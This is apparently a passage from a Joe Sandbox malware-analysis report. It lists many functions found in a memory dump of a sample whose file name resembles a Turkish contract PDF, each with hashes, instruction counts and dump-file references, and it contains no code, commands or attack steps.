                              • String ID:
                              • API String ID:
                              • Opcode ID: f8f6d8abad83770abf5f9668ca46b985bd05a91de76060055620f67dc794d94d
                              • Instruction ID: 530b0c623590e1fd9210730d14c3f57f5e2174a3fed0062a5a0928f384b49c8a
                              • Opcode Fuzzy Hash: f8f6d8abad83770abf5f9668ca46b985bd05a91de76060055620f67dc794d94d
                              • Instruction Fuzzy Hash: C5419376D0022AABDB119BE88854FEFB7BCEF04794F514166ED04F7200DA76DE058BA0
                              Function 32BCA350 Relevance: .1, Instructions: 139COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c8ce677e44fb628768078dba21ada2e5b9a91946f30240c4797a01f476141ff9
                              • Instruction ID: 60d5e0df89f4d9ecf9da35c19a9c9254c1da3df7160ca42a8db2b4c38c80052a
                              • Opcode Fuzzy Hash: c8ce677e44fb628768078dba21ada2e5b9a91946f30240c4797a01f476141ff9
                              • Instruction Fuzzy Hash: 5A41F2756813619BEB18DFA88C91F5BB768EB84744F00892DED05AB350DAB1D842CBA1
                              Function 32C63157 Relevance: .1, Instructions: 139COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f214effcb33f9e200134cc2f3033af8f81f25d4603751b67d23a564d7d5a3cbf
                              • Instruction ID: 6c4acb309baf4a854f1360ce34ab133a1da9f66fc3f941720ba5b44ccfc3a4cb
                              • Opcode Fuzzy Hash: f214effcb33f9e200134cc2f3033af8f81f25d4603751b67d23a564d7d5a3cbf
                              • Instruction Fuzzy Hash: E7518C71600646EFDB05CF54C980E56BBF5FF85708F1981AAE808DF262E7B1EA45CB90
                              Function 32BC0118 Relevance: .1, Instructions: 138COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b46f165ccd90dd4af4142feae407434a21058b296efc1ce8c03d9ecdc3a7719b
                              • Instruction ID: 803164fd34a7a0084dd778b5239e3c77c96dd953125d50c5628527227e5d7124
                              • Opcode Fuzzy Hash: b46f165ccd90dd4af4142feae407434a21058b296efc1ce8c03d9ecdc3a7719b
                              • Instruction Fuzzy Hash: A341DD7A901328DBDF04CF98C440AEEB7B8FF48708F11856AE855EB254EB718D41CBA4
                              Function 32B9D454 Relevance: .1, Instructions: 138COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 72d250c60433d9a27c76156b4e5cbaf6be645b6e424d8df250c6f5ce9e6bafde
                              • Instruction ID: 4e5d1eefada8e338da2948a7539694955343f46b1e1520e2dc83d7dca2d447b1
                              • Opcode Fuzzy Hash: 72d250c60433d9a27c76156b4e5cbaf6be645b6e424d8df250c6f5ce9e6bafde
                              • Instruction Fuzzy Hash: 9B51FF7A204BA29FD315DB19C890B9AB3E5EB41BD4F4904B4F8018B7A1EB75EC44CB71
                              Function 32BD2670 Relevance: .1, Instructions: 137COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 378b6ea2690461ba2e231297a609f0620a72d96a2581e8c9db1b1bf84233c730
                              • Instruction ID: 051c189f72e8f46469f117310c0bb167c356be22fb160d8463d6255983e339d0
                              • Opcode Fuzzy Hash: 378b6ea2690461ba2e231297a609f0620a72d96a2581e8c9db1b1bf84233c730
                              • Instruction Fuzzy Hash: A7513779A00615CFDB04CF99C480AAEB7B1BF88714F2581A9D919E7350D731EE85CF90
                              Function 32B96074 Relevance: .1, Instructions: 133COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4c75768c03b66857baf64c9b7f9a4e76c8d3f132ffce2a6f39621749d841bfa6
                              • Instruction ID: 18b417a4546c002c9de8d7f82a806a21e75e8e77a96e8410d25d3d23c429c239
                              • Opcode Fuzzy Hash: 4c75768c03b66857baf64c9b7f9a4e76c8d3f132ffce2a6f39621749d841bfa6
                              • Instruction Fuzzy Hash: 3551F574A44266DBDB19CF24CC50BE9B7B1EF01318F1082B9D459A72D2EB7599C5CF40
                              Function 32B8B0D6 Relevance: .1, Instructions: 131COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0a77446134711b89d8a98cfbb3a14caa00a27ce50ef58c69014e1b864fb5dc29
                              • Instruction ID: 667254da9041a83e9441afd82d94151886b324b6d50bed7fcb2c7660f38e1c3a
                              • Opcode Fuzzy Hash: 0a77446134711b89d8a98cfbb3a14caa00a27ce50ef58c69014e1b864fb5dc29
                              • Instruction Fuzzy Hash: DF41CDB0650395EFE715EF34C850F66BBE8EF00784F008429E955DB250DBB0D981CB50
                              Function 32C581EE Relevance: .1, Instructions: 129COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 95cdbe95bb8996302c3a8d41c5b3ae229fe236cac5597281b1d7625f0f83cc21
                              • Instruction ID: 593042d21f8991c42a02dabf64a99b38ac8a229628b8354db6f36bb3c906a936
                              • Opcode Fuzzy Hash: 95cdbe95bb8996302c3a8d41c5b3ae229fe236cac5597281b1d7625f0f83cc21
                              • Instruction Fuzzy Hash: 5341D675B00609ABDB04CF96DC90AAFBBBAFF88744F644169E805E7341DA70CD81C760
                              Function 32B907A7 Relevance: .1, Instructions: 128COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: da0a6d423ff402c5d162f5d1ce32f435d3b0f34401dddd758d4784a89215bda8
                              • Instruction ID: d6ad6ec93e2b72936dcd73a9f0087915c1ecffed60db5e874804932650337b54
                              • Opcode Fuzzy Hash: da0a6d423ff402c5d162f5d1ce32f435d3b0f34401dddd758d4784a89215bda8
                              • Instruction Fuzzy Hash: BF416CB16007519FE328CF68D880A92B7F9FF48318B508A7DD956C6A50EB71F855CB90
                              Function 32BBD600 Relevance: .1, Instructions: 126COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7d09c413cc6de1f5487295f8e2798fb72c8a41674bfa47218e97cd923ff62fe7
                              • Instruction ID: 3d0f9abb064192e989b37cfa3f394cd85587b3a65b39e518fef82369215521bc
                              • Opcode Fuzzy Hash: 7d09c413cc6de1f5487295f8e2798fb72c8a41674bfa47218e97cd923ff62fe7
                              • Instruction Fuzzy Hash: 2C4103B1101241AFD720DF24CC80FBBB7A8EF543A0F014A2DF96997691CB75E845CB92
                              Function 32BC0630 Relevance: .1, Instructions: 121COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: db222aff31ac99bbcf2dda992de91452d5bad2b8758ffabb997b8c49cee3dcdf
                              • Instruction ID: 04eb207d3f4be6e5236badb48293ef7df4442e5b811bf6b066aa29265cdf1f1f
                              • Opcode Fuzzy Hash: db222aff31ac99bbcf2dda992de91452d5bad2b8758ffabb997b8c49cee3dcdf
                              • Instruction Fuzzy Hash: E9414875A00725EFDB28DFA8C980A9AB7F8FF48704B10497EE556E7650DB30AA44CF50
                              Function 32C5D7A7 Relevance: .1, Instructions: 120COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cc0952ce232fb38934c9d4d489ca2ce555121c210ef2a1f197b3e604d7479806
                              • Instruction ID: 05d2ffb5360c866d23fc31731495b274282c388d0a27a0dc802f734f55f071e3
                              • Opcode Fuzzy Hash: cc0952ce232fb38934c9d4d489ca2ce555121c210ef2a1f197b3e604d7479806
                              • Instruction Fuzzy Hash: 7F41EDB16047018BE315DF2AC8A0B2BB7E5EFC4B54F24456DE885C7381EE78D845CB95
                              Function 32BC1796 Relevance: .1, Instructions: 112COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5011f512a3ba41d35ae320f31e751af18401308ec91498a64b7cc15aa5b8ab7a
                              • Instruction ID: 5259f69415e042347bbadc37114aa171babf07e1903410a41f786ae56d806875
                              • Opcode Fuzzy Hash: 5011f512a3ba41d35ae320f31e751af18401308ec91498a64b7cc15aa5b8ab7a
                              • Instruction Fuzzy Hash: C74147B5E09265DFDB09CF59C880B99B7F1FB88B04F15C16AE908AB344CB74A941CF50
                              Function 32C10227 Relevance: .1, Instructions: 111COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 734f0dfa678df3d7fc30b4357fbce6697e1644c0072e92dc389cfbaf211cef95
                              • Instruction ID: bbc45fc39238f471fc10a5d4565aa313d6ba8c758622de21b07c5cf3b2287772
                              • Opcode Fuzzy Hash: 734f0dfa678df3d7fc30b4357fbce6697e1644c0072e92dc389cfbaf211cef95
                              • Instruction Fuzzy Hash: 5141BD766087419FC314CF69D891A6AB3A9FF88700F400A29F898C7690EB30E905D7A6
                              Function 32BA01F1 Relevance: .1, Instructions: 106COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 60217219fab30d7d5fc2cb2f90293db42116593f581b72c7076c745c3ea74110
                              • Instruction ID: 3fe96b47c619b3c4c90296bf2acd8aee33317ee755d128389b1fd96e0ac3faab
                              • Opcode Fuzzy Hash: 60217219fab30d7d5fc2cb2f90293db42116593f581b72c7076c745c3ea74110
                              • Instruction Fuzzy Hash: F3312735A08354ABDB118FA8CC40FEABBB9EF04350F0445A6E894D7352DAB49984CB65
                              Function 32BB9194 Relevance: .1, Instructions: 105COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: e3050690cd21a977667ab6879ab43a3715897361f4b27fc85dbea27ea3179bcc
                              • Instruction ID: 2ecb6051948be4b6dfd0e01f40218e3fee2fd2ddb5ace38db3b3217cf4eac029
                              • Opcode Fuzzy Hash: e3050690cd21a977667ab6879ab43a3715897361f4b27fc85dbea27ea3179bcc
                              • Instruction Fuzzy Hash: 30318176E00728AFDF218F64CC40FAAB7B5EF86710F1101A9A98CA7240DB719E84CF51
                              Function 32B94180 Relevance: .1, Instructions: 102COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a80f3d8bfb82416099ea4da57d77742535cd4c0b8cec12ef61cb952cd4356d9a
                              • Instruction ID: d978b10c42e6ed6f1c13c8489f6f53d7885fb8ea7213591cc20587bd946334df
                              • Opcode Fuzzy Hash: a80f3d8bfb82416099ea4da57d77742535cd4c0b8cec12ef61cb952cd4356d9a
                              • Instruction Fuzzy Hash: F141CE71104B49EFD722CF24C990FD677E9EF44308F00882AE9998B761DB75E804CBA0
                              Function 32BB66E0 Relevance: .1, Instructions: 102COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3b5ea768f5c6f27d87bba895ac2d90d9c232eb6d903ecbccf215107f60aedf4c
                              • Instruction ID: 36b2242dd0edbe0fd2dd09a0b17dacee7a79f57f5431affef1f358525f44c3cd
                              • Opcode Fuzzy Hash: 3b5ea768f5c6f27d87bba895ac2d90d9c232eb6d903ecbccf215107f60aedf4c
                              • Instruction Fuzzy Hash: 6641BFB6500A55EFCB22CF14C980FAA77A5FF44B90F408538E8458B6A0CF72EC45DB94
                              Function 32BB5004 Relevance: .1, Instructions: 101COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e9a1b4e739a61d39d5391a5ebe807c26577b61d7282414683b6545c56c7ed405
                              • Instruction ID: f1d481b95b9cea4d886567187c99ad72ba1aea5039d5689cac459b0ea7fcecdd
                              • Opcode Fuzzy Hash: e9a1b4e739a61d39d5391a5ebe807c26577b61d7282414683b6545c56c7ed405
                              • Instruction Fuzzy Hash: 6F31F5756083519FEB11DA28C410B76B7E5EF89394F84852AFDC4CB281DA76C885C7E3
                              Function 32C0E79D Relevance: .1, Instructions: 100COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a8dd5db72688a5cf068e12f4413b501746353b619dd847aaf52de41e96428b07
                              • Instruction ID: c85090dd30636f19b10966b5cf8896edce6443f0002edf21603f2cc2b4de2548
                              • Opcode Fuzzy Hash: a8dd5db72688a5cf068e12f4413b501746353b619dd847aaf52de41e96428b07
                              • Instruction Fuzzy Hash: 323124B5685780ABE316475D8C48F21B3D8BF80B88F5544F0EE00DB6D2EF68E840CAA4
                              Function 32B906CF Relevance: .1, Instructions: 95COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5c14301f22dc0914f4f178d03a5970cbd1e2c05a0df57af9a26cf9872153f25b
                              • Instruction ID: 94970d46028703b55d96947cab7beeb5dc0a48282a6cdd37fd98a3d36cd75c26
                              • Opcode Fuzzy Hash: 5c14301f22dc0914f4f178d03a5970cbd1e2c05a0df57af9a26cf9872153f25b
                              • Instruction Fuzzy Hash: 3B31BF36604752ABD716DE248880E9B77A6EB847A0F024939FD15D7210EF35DC05CBA2
                              Function 32B98470 Relevance: .1, Instructions: 94COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 14871eadfb8817be92c6a1e6f5dd8d3d172fbabc52e0c4d2721c40d9952c93ef
                              • Instruction ID: 6691476e8018afb64730e7cb95b0e40504269e14cae984eb66bac15bf305444f
                              • Opcode Fuzzy Hash: 14871eadfb8817be92c6a1e6f5dd8d3d172fbabc52e0c4d2721c40d9952c93ef
                              • Instruction Fuzzy Hash: 1031CEB2A153519FE314CF09C800BA6B7E5FF88B04F44496DF88897390EBB5E808CB91
                              Function 32B8D64A Relevance: .1, Instructions: 93COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e305e0d7f41ac056458eddf92bc4299b25b47a72481478b7a5e1aaa482e8e8be
                              • Instruction ID: d0ef9c26d974803194671af78cef28c610b408d33a235a6b878d43dba8fbd770
                              • Opcode Fuzzy Hash: e305e0d7f41ac056458eddf92bc4299b25b47a72481478b7a5e1aaa482e8e8be
                              • Instruction Fuzzy Hash: 8331A2BB60029AEFEB11CE64D980F5A73B9DB847D8F21842AED0D9B254DB74DD40CB50
                              Function 32C617BC Relevance: .1, Instructions: 91COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
                              • Instruction ID: fc762a6161578ec4e907ea6448d85643a24fb51a252fa92659945eef315b84ec
                              • Opcode Fuzzy Hash: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
                              • Instruction Fuzzy Hash: 453181B2D00215EFC704DF69C880AADB7F1FF98719F198169E894DB341D734AA51CBA0
                              Function 32BB42AF Relevance: .1, Instructions: 89COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d5db282731ae6719cb05b68299e38aba5b47fa3c711fb62145cd76dbd005797c
                              • Instruction ID: 47f9b0d068b593d146332bcfce2dfd2196c359fb780053562d901b5a46d4eece
                              • Opcode Fuzzy Hash: d5db282731ae6719cb05b68299e38aba5b47fa3c711fb62145cd76dbd005797c
                              • Instruction Fuzzy Hash: 2B31DC71B00245AFDB10DFA8C990EAEB7FAFF44308F188529D585E7650DB70D949CB90
                              Function 32B991E5 Relevance: .1, Instructions: 89COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
